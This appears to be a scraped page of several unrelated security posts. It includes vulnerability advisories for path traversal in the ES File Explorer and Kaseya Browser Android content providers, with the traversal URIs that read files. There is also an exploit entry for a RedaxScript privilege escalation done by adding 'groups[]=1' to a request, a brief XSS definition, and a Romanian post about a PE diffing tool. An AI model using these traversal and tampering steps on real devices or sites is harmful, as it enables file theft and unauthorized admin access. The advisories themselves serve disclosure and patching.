android.permission.BLUETOOTH_ADMIN - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.WRITE_MEDIA_STORAGE - android.permission.WAKE_LOCK - android.permission.READ_PHONE_STATE - android.permission.ACCESS_SUPERUSER - android.permission.VIBRATE - .PERMISSION - android.permission.CHANGE_WIFI_MULTICAST_STATE - android.permission.SYSTEM_ALERT_WINDOW - android.permission.GET_TASKS - android.permission.READ_EXTERNAL_STORAGE Defines Permissions: - None Activities: com.estrongs.android.pop.view.FileExplorerActivity com.estrongs.android.pop.app.compress.CompressionActivity com.estrongs.android.pop.app.compress.CompressionProxyActivity com.estrongs.android.pop.app.ESFileSharingActivity com.estrongs.android.pop.app.SaveToESActivity com.estrongs.android.pop.app.LocalFileSharingActivity com.estrongs.android.pop.app.PopVideoPlayer com.estrongs.android.pop.app.PopVideoPlayerProxyActivity com.estrongs.android.pop.app.AudioPlayerProxyActivity com.estrongs.android.pop.app.editor.PopNoteEditor com.estrongs.android.pop.app.FileChooserActivity com.estrongs.android.pop.app.ESContentChooserActivity com.estrongs.android.pop.app.ESRingtoneChooserActivity com.estrongs.android.pop.app.ESWallPaperChooserActivity com.estrongs.android.pop.app.DownloaderActivity com.estrongs.android.pop.app.BrowserDownloaderActivity com.estrongs.android.pop.app.PopRemoteImageBrowser com.estrongs.android.pop.ftp.ESFtpShortcut com.estrongs.android.pop.app.ShowDialogActivity com.estrongs.android.pop.app.AppCheckUpdateList com.estrongs.android.pop.app.DefaultWindowSetting com.estrongs.android.pop.app.DocumentExtModifyList com.estrongs.android.pop.app.TransitActivity Broadcast(Receiver): com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver com.baidu.share.message.ShareReceiver com.estrongs.android.pop.EnableOEMConfig com.estrongs.android.pop.app.InstallMonitorReceiver com.estrongs.android.pop.app.StartServiceReceiver Services: com.estrongs.android.pop.bt.OBEXFtpServerService Permission: null Providers: Authority: com.estrongs.files Read Permission: null Write Permission: null Content Provider: com.estrongs.android.pop.app.FileContentProvider Multiprocess Allowed: False Grant Uri Permissions: True read content://com.estrongs.files/system/../../../../../sdcard/<file> Read file hosts read content://com.estrongs.files/system/etc/hosts 127.0.0.1 localhost Solution - Fix & Patch: ======================= In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. Vulnerable code: com.estrongs.files Read Permission: null Write Permission: null android:exported="true" change "true" to "false" When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it. <provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> Fixed code: <provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> read content://com.estrongs.files/system/etc/hosts Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProv ider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid =10216) that is not exported from uid 10235 Security Risk: ============== The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ Source

M-am gandit sa mai ofer si eu ceva comunitati,ca tot am cerut pana acum

With this utility you can compare two PE-module files (exe,dll,...). Pediff.dll uses levenshtein distance algorithm to find identical and/or similar functions in two binaries. There's an option to import .map file for first binary and remap it correctly to second module. External text differ application can be easily integrated. Archive includes c++ source code - class which allows you to write your own . Download: Zippyshare.com

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Kaseya Browser Android Path Traversal Affected Versions: Kaseya Browser 7.0 Android PDF: http://www.security-assessment.com/files/documents/advisory/Kaseya_Browser_Android_Path_Traversal.pdf +-------------+ | Description | +-------------+ This advisory details a vulnerability found within Kaseya Browser Android application. A path traversal vulnerability was discovered within an exported content provider, resulting in the disclosure of arbitrary files, including internal application files. +--------------+ | Exploitation | +--------------+ The Kaseya Browser Android application exposes a content provider that is vulnerable to path traversal. This allows any other application installed on the device to read arbitrary files using the Kaseya Browser application’s permissions. This can be done by reading from the com.roverapps.retriever content provider as follows: content://com.roverapps.retriever/../../../../../sdcard/<file> content://com.roverapps.retriever/../databases/suitestorage.db +----------+ | Solution | +----------+ No official solution is currently available for this issue. +---------------------+ | Disclosure Timeline | +---------------------+ 03/10/2014 - Initial contact with Kaseya Support 09/10/2014 - Established Kaseya security contact 13/10/2014 - Advisories sent to Kaseya 21/10/2014 - Additional information sent to Kaseya 22/11/2014 - Update from Kaseya 29/01/2015 - Advisory Release +-------------------------------+ | About Security-Assessment.com | +-------------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment com Phone +64 4 470 1650 Source

XSS or Cross Site Scripting is a web application vulnerability that occurs when untrusted data from the user is processed by the web application without validation and is reflected back to the browser without encoding or escaping, resulting in code execution at the browser engine. type of XSS Reflected or Non-Persistent XSS ? Stored or Persistent XSS ? DOM based XSS ? mXSS or Mutation XSS Read more: http://dl.packetstormsecurity.net/papers/general/ultimate-xss.pdf

# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tampering the parameter values. An attacker can exploit this issue to gain elevated privileges to the application. *Steps to reproduce the instance:* · login as a non admin user · Go to account and update the account. · intercept the request and add “*groups[]=1*” to the post data and submit the request · Log out of the application and log in again. You can now browse the application with admin privileges. This vulnerability was addressed in the following commit. https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified *Timeline*: 09-26-2014: Issue identified 09-27-2014: Discussion with the vendor 10-27-2014: Issue confirmed 11-05-2014: Patch released. Author: Shyamkumar Somana Vendor Homepage: http://redaxscript.com/download Version: 2.1.0 Tested on: Windows 7 -- [image: --] shyam kumar [image: http://]about.me/shyamkumar.somana <http://about.me/shyamkumar.somana?promo=email_sig> Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ | Source